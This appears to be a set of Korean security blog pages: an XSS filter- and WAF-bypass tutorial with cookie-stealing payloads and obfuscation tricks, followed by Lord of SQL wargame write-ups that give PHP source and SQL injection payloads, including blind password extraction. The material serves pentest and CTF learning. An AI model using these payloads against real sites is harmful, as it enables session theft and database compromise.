[Summary]


본 글은 각종 모의해킹 및 버그바운티 시 XSS 취약점을 분석하며 얻은 경험을 토대로 작성한 글입니다.

서버 소스코드단의 필터링 및 네트워크단의 WAF 필터링 등을 우회하여 XSS Exploit을 성공시키기 위한 기법들을 일부 정리하였습니다.



[Example 1]


조건 1

https://ar9ang3.com/?param1=abc로 요청했을 시(지금은 GET으로 보냈지만 POST일 경우에도)


조건 2

서버단에 요청한 URI가 직접 javascript단으로 삽입될 경우


<script>

document.location.href = 'https://ar9ang3.tistory.com/?param1=abc';

</script>


제약조건 3

%3b(;), %2b(+)가 WAF단에서 필터링되어 document.location.href= 등을 벗어나지 못할 경우



우회 및 XSS 트리거 코드 1 (Reflected XSS)

문자열 - Native Function - 문자열 을 수행할 시 문자열의 결과를 연산하는 과정에서 Native Function이 실행되게 됩니다. 때문에 document.location="abc"-alert(document.cookie)-"def"; 와 같은 구문이 있을 시 document.location의 결과와는 상관 없이 alert(document.cookie) 구문이 실행되게 됩니다.


{example}

?param1=abc'-alert(document.cookie)-'def


<script>

document.location.href = 'https://ar9ang3.tistory.com/?param1=abc'-alert(document.cookie)-'def';

</script>


우회 및 XSS 트리거 코드 2 (Redirect to other Site)

위의 트리거 코드 1과 비슷하지만 && 연산자를 이용한다는 점이 다릅니다. 


?param1=abc'&&'https://ar9ang3.com/


<script>

document.location.href = 'https://ar9ang3.tistory.com/?param1=abc'&&'https://ar9ang3.com/';

</script>


이와 같이 우회가 가능하다.



우회코드 1번의 경우 document.location.href 뒤의 문자열이 문자열 - alert(1)의 결과값 - 문자열이 되고, 문자열 - 문자열(상수)는 NaN이 됨으로 host의 /NaN으로 요청하게 된다. 하지만 이 중간에 alert에 해당하는 곳에 코드가 실행되게 된다.


우회코드 2번의 경우 문자열 && 문자열 을 할 시 뒤의 문자열이 최종적으로 적용되기 때문에 최종적으론 뒤에 적어놓은 문장으로 document.location.href가 동작하게 됨으로 내가 원하는 페이지로 redirect 시킬 수 있다.



WAF Bypass Tips


. 을 필터링 할 시

document.cookie => document['cookie']


(" ")를 필터링 할 시

eval("alert(1)") => eval[alert(1)]


;나 +를 필터링 할 시

'abc'-alert(1)-'def' => 함수 실행 후 정상 문자열을 대입하여야 할 때 => 'abc'-alert(1)^1&&'normal_string_here'


종합해보면


'abc'-eval[alert(document['cookie'])]^1&&'normal_string_here'


document.location.href 의 문자열에 대입해보면


document.location.href = 'abcdef?param1=haha'-eval[alert(document['cookie'])]^1&&'https://ar9ang3.com/';




More Filtering Bypass tips


임의의 자바스크립트 구문을 삽입할 수 있다고 가정하였을 때 우리는 두 가지를 생각하여야 합니다.


 1. 삽입된 자바스크립트 구문으로 인하여 '자바스크립트 문법 에러'가 유발되지 않는지

 2. 삽입하는 자바스크립트 구문이 필터링되지 않는 지



<< 1. 삽입된 자바스크립트 구문으로 인하여 '자바스크립트 문법 에러'가 유발되지 않는지>>

1번의 경우엔 jsbeautifier, sublimetext와 같은 beautify 혹은 ide툴을 통해 문법에러를 찾아내고(괄호 에러 등), 에러가 나서 자바스크립트 구문이 정상적으로 실행되지 않는다면 크롬의 개발자도구 콘솔창에 나타나는 자바스크립트 에러메세지를 확인하여 문법 에러를 찾아 낼 수 있습니다. 예를들어보면 아래와 같습니다.


 try {

    if ('injection'==<%=request.getParameter("param")%>) {

        var a = "%inject here%";

    }

    var f = function(x) {

        var z = {

            a : 1,

            b : 2,

            c : 3

        };

        return a;

    }

} catch (e) { 

    console.log("err");

}


위와같은 구문에서 inject here에 우리가 원하는 임의의 자바스크립트 구문을 넣을 수 있다고 해봅시다. try 구문 안에있는 if 구문 안에 var a를 선언하는 과정에서 injection이 발생하였습니다. 우리가 원하는 스크립트를 실행시키기 위해선 if 조건과 상관없이 동작하도록 자바스크립트 코드를 재구성하여야 합니다.


[Method 1]




첫번째 방법은 문법을 맞춰주는것입니다. 구문에 맞게 모두 삽입하면 정상적으로 자바스크립트 코드가 실행되는것을 볼 수 있습니다.


[Method 2]


두번째 방법은 아래와 같습니다.


 try {

    if ('injection'==<%=request.getParameter("param")%>) {

        var a = "blahblah";

    }

} catch(e) { }

alert(document.cookie);

</script>

<noscript>";

    }

    var f = function(x) {

        var z = {

            a : 1,

            b : 2,

            c : 3

        };

        return a;

    }

} catch (e) { 

    console.log("err");

}

</script>와 <noscript>를 삽입할 수 있을 시 위와같은 구문으로 대충 닫는것만 맞춰주고 스크립트를 실행시킨 후 스크립트 태그를 닫아버리고 noscript를 동작시키는것입니다.



위에 소개된 방법 외에도 xss가 터지는 상황은 워낙에 다양하기 때문에 그 상황상황에 맞춰 Exploit을 하여야 합니다. 만약 우리가 입력한 파라미터가 html 스크립트 내에 두곳으로 들어가게 되고, 이로인해 에러가 유발된다면 `(Back Quote)를 이용하여 두 삽입지점 사이의 모든 코드를 문자열로 만들거나 /* */와 같은 주석 코드를 이용하여 두 삽입지점 사이의 모든 문자를 무효화 할 수도 있습니다. 이와같이 다양한 방법으로 자바스크립트 문법 에러를 회피할 수 있습니다.




<<2. 삽입하는 자바스크립트 구문이 필터링되지 않는 지>>


필터링되는 문자열은 다양합니다. <, >, ', ", (, ), `, ;, %, &, +


위와같은 Character가 필터링 되어있을 시 우회하는 방법에 대해 일부 소개하고자 합니다.


Example Code

 -> alert(document.cookie);


alert와 같은 native function 자체를 필터링 할 시

 var a=alert; a(document.cookie);


document.cookie 등을 필터링 할 시

 var a='alert'; var b='(documen'; var c='t.cooki'; var d='e)'; var e=eval; e(a+b+c+d);


무언가 문자열을 필터링할 때

 var a=eval; a(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="));

 BASE64로 인코딩 후 실행


' / "를 필터링 할 시

 ?param_a=\&param_b=;alert(document.cookie);var%20z='

 var a='\'; var b=';alert(document.cookie);var z='';


( ) 괄호를 필터링 할 시

 alert`123`;

 btoa.constructor`alert\x28document.cookie\x29```

  -> 이에대해 조금 더 설명하자면, `(back quote)는 살짝 특별한 Character이다. 문자열을 만들때도 사용할 수 있으며, 함수를 실행할 때 인자를 alert`123`; 처럼 줄 수도 있다. 때문에 이에 대해 조금더 언급하면, btoa와 같은 Native function의 constructor method를 이용하여 인자로 문자열로 된 스크립트 구문 을 전달하면 btoa의 constructor function으로 스크립트가 지정된다. 이후 `(back quote)를 두번 써줌으로써 btoa를 실행시키게 되고, 이로인해 앞에서 저장한 스크립트 구문이 실행되게 된다. 또한 자바스크립트에선 \x28과 같은 Ascii hex를 자동으로 converting 해주기 때문에 \x28, \u28, \u0028과 같은 구문들이 문자열 내에서 자동으로 ascii charcter로 변환되게 된다. 때문에 최종적으로 alert(document.cookie) 구문이 실행되게 된다.






여러가지 상황에서 XSS를 성공시키는 법에 대해 알아보았는데, 솔직히 XSS의 경우 Mitigation 구현도 다양하고 삽입되는 위치와 상황도 모두 다 다양합니다. 때문에 천편일률적인 우회 기법이 아니라 그때그때 상황에 맞추어 우회하는것이 중요하다고 생각합니다. 최근 한글 XSS, 가타카나 XSS등과 같은 내용들도 보았는데, 이처럼 새로운 방법들이 계속해서 나오고 있습니다. 이러한 내용들까지 모두 언급하지는 않고 이정도로만 작성하고 마치도록 하겠습니다.





query : select id from prob_succubus where id='' and pw=''

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[id])) exit("No Hack ~_~"); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(
preg_match('/\'/i'$_GET[id])) exit("HeHe"); 
  if(
preg_match('/\'/i'$_GET[pw])) exit("HeHe"); 
  
$query "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id']) solve("succubus"); 
  
highlight_file(__FILE__); 
?>



  if($result['id']) solve("succubus"); 


쿼리의 결과값이 뭐든 나오면 문제가 풀립니다. id와 pw필드에 싱글쿼터를 필터링하고 있습니다. 우리는 \(백슬래시)를 적절히 이용하여 이 문제를 해결할 수 있습니다. id 파라미터에 \를 넣게되면 id 필드를 닫는 싱글쿼터가 문자열로 인식되어 pw 필드를 여는 싱글쿼터까지(' and pw=') 문자열로 인식되게 됩니다. 이후 우리가 pw 파라미터에 넣어주는 값은 문자열로 인식되는 필드를 벗어나게 됩니다.


?id=\&pw=||1%23

payload












query : select id from prob_zombie_assassin where id='' and pw=''

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/\\\|prob|_|\.|\(\)/i'$_GET[id])) exit("No Hack ~_~"); 
  if(
preg_match('/\\\|prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(@
ereg("'",$_GET[id])) exit("HeHe"); 
  if(@
ereg("'",$_GET[pw])) exit("HeHe"); 
  
$query "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id']) solve("zombie_assassin"); 
  
highlight_file(__FILE__); 
?>



  if($result['id']) solve("zombie_assassin"); 


쿼리의 결과값 id 값이 뭐든 출력되면 문제가 풀립니다. 다만 id와 pw 파라미터에 싱글쿼터가 ereg 함수로 필터링되어있네요. ereg 함수는 널바이트까지 인식하여 해당 문자열을 비교합니다. 때문에 널바이트 이후에 필터링 대상 문자열을 넣으면 해당 문자열은 필터링하지 않습니다. 우리는 이를 이용하여 문제를 해결할 수 있습니다.



?id=%00'||1%23

payload








query : select id from prob_skeleton where id='guest' and pw='' and 1=0

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  
$query "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id'] == 'admin'solve("skeleton"); 
  
highlight_file(__FILE__); 
?>



  if($result['id'] == 'admin'solve("skeleton"); 


쿼리의 결과값 id가 admin이면 문제가 풀립니다. id는 guest로 고정되어있고 pw에 괄호를 필터링하고 있습니다. 기존에 사용하던 방법 그대로 문제를 해결할 수 있습니다.



?pw='||id='admin'%23

payload







query : select 1234 fromprob_giant where 1

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
strlen($_GET[shit])>1) exit("No Hack ~_~"); 
  if(
preg_match('/ |\n|\r|\t/i'$_GET[shit])) exit("HeHe"); 
  
$query "select 1234 from{$_GET[shit]}prob_giant where 1"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result[1234]) solve("giant"); 
  
highlight_file(__FILE__); 
?>



  if($result[1234]) solve("giant"); 


 쿼리의 결과값이 뭐든 나오면 문제가 해결됩니다. 다만 from과 테이블명이 붙어있고, 그 사이에 get parameter로 받은 값을 넣게 되는데 1글자 이상 넣을 수 없고 캐리지리턴 라인피드 탭 문자는 필터링되고 있습니다. 이는 곧 white space 필터링을 우회하라는 말이 됩니다. white space는 %0a %0b %0c %0d %09 %20 등으로 사용할 수 있습니다.(자세한 내용은 los(lord of sql) level 13 - bugbear 참고)


?shit=%0b

payload










query : select id from prob_bugbear where id='guest' and pw='' and no=

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[no])) exit("No Hack ~_~"); 
  if(
preg_match('/\'/i'$_GET[pw])) exit("HeHe"); 
  if(
preg_match('/\'|substr|ascii|=|or|and| |like|0x/i'$_GET[no])) exit("HeHe"); 
  
$query "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  
$_GET[pw] = addslashes($_GET[pw]); 
  
$query "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if((
$result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  
highlight_file(__FILE__); 
?>



  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 


이번에도 blind sqli 문제입니다. pw 파라미터에 싱글쿼터, no 파라미터에 substr, ascii, =(이퀄), or, and, white space(%20), like, 0x가 필터링 되어있습니다. 


whitespace 는 %0a, %0d 등으로, =와 like는 'in'으로, 0x는 0b 등으로 치환하여 페이로드를 구성할 수 있습니다.(자세한 내용은 웹해킹 SQLI 우회기법 정리 - Webhacking SQL Injection Bypass Honey Tips 참고)



?no=1||id%0ain("admin")%26%26hex(mid(pw,1,1))%0ain(41)%23

payload










query : select id from prob_darkknight where id='guest' and pw='' and no=

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[no])) exit("No Hack ~_~"); 
  if(
preg_match('/\'/i'$_GET[pw])) exit("HeHe"); 
  if(
preg_match('/\'|substr|ascii|=/i'$_GET[no])) exit("HeHe"); 
  
$query "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  
$_GET[pw] = addslashes($_GET[pw]); 
  
$query "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if((
$result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  
highlight_file(__FILE__); 
?>



  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 


blind sqli 문제입니다. no 파라미터에 substr, ascii, =를 필터링하고 있습니다. 또 pw 파라미터에 싱글쿼터를 필터링하고 있습니다.


이전 문제와 같지만 싱글쿼터가 필터링 중이니 string 문자열을 hex encoding하여 페이로드를 작성합시다.



?no=1||id like 0x61646d696e%26%26right(left(pw,1),1)like(0x41)%23

payload







query : select id from prob_golem where id='guest' and pw=''

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(
preg_match('/or|and|substr\(|=/i'$_GET[pw])) exit("HeHe"); 
  
$query "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  
$_GET[pw] = addslashes($_GET[pw]); 
  
$query "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if((
$result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
  
highlight_file(__FILE__); 
?>



  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 


blind sqli 문제네요. or, and, substr(, =를 필터링중입니다. substr이 필터링 되어있을 시 left, right를, =(이퀄)이 필터링 되어있을 시 like를 사용하여 쿼리문을 작성할 수 있습니다. (자세한 내용은 웹해킹 SQLI 우회기법 정리 - Webhacking SQL Injection Bypass Honey Tips 참조)



?pw='||id like('admin')%26%26right(left(pw,1),1)like(0x41)%23

payload









query : select id from prob_skeleton where id='guest' and pw='' and 1=0

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  
$query "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id'] == 'admin'solve("skeleton"); 
  
highlight_file(__FILE__); 
?>



  if($result['id'] == 'admin'solve("skeleton"); 


쿼리의 결과값 id가 admin이면 됩니다. 소괄호를 필터링 중이고 pw 파라미터가 오는 곳 뒤에 and 1=0이 되어있습니다. 뒤를 무력화시켜야겠군요. 앞선 문제와 똑같은 페이로드로 문제를 해결할 수 있습니다.


?pw='||id='admin'%23 

payload









'Web > LOS (Lord of SQL)' 카테고리의 다른 글

los(lord of sql) level 12 - darkknight  (0) 2018.08.21
los(lord of sql) level 11 - golem  (0) 2018.08.21
los(lord of sql) level 10 - skeleton  (0) 2018.08.21
los(lord of sql) level 9 - vampire  (0) 2018.08.21
los(lord of sql) level 8 - troll  (0) 2018.08.21
los(lord of sql) level 7 - orge  (0) 2018.08.21

query : select id from prob_vampire where id=''

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/\'/i'$_GET[id])) exit("No Hack ~_~");
  
$_GET[id] = strtolower($_GET[id]);
  
$_GET[id] = str_replace("admin","",$_GET[id]); 
  
$query "select id from prob_vampire where id='{$_GET[id]}'"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id'] == 'admin'solve("vampire"); 
  
highlight_file(__FILE__); 
?>



  if($result['id'] == 'admin'solve("vampire"); 


쿼리의 결과값 id가 admin이 되면 됩니다. id를 소문자로 변경 후 str_replace로 admin을 공백으로 치환시킵니다. admin이 사라지는걸 생각해서 adadminmin을 넣으면 admin으로 치환되는것으로 문제를 해결할 수 있습니다.



?id=adadminmin 

payload





'Web > LOS (Lord of SQL)' 카테고리의 다른 글

los(lord of sql) level 11 - golem  (0) 2018.08.21
los(lord of sql) level 10 - skeleton  (0) 2018.08.21
los(lord of sql) level 9 - vampire  (0) 2018.08.21
los(lord of sql) level 8 - troll  (0) 2018.08.21
los(lord of sql) level 7 - orge  (0) 2018.08.21
los(lord of sql) level 6 - darkelf  (0) 2018.08.21

+ Recent posts